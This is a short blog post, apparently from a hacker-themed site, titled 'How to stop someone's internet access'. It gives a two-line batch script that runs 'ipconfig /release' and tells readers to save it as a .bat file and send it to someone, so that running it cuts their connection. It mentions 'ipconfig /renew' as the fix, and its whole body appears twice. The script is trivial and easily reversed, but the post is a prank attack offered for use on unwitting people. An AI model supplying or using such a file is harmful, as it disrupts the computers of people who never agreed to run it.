How to stop someone's internet access
Copy this text in notepad
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone.When they will run it there IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
- See more at: http://hackersnetwork-2.blogspot.in/
Copy this text in notepad
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone.When they will run it there IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
- See more at: http://hackersnetwork-2.blogspot.in/
No comments:
Post a Comment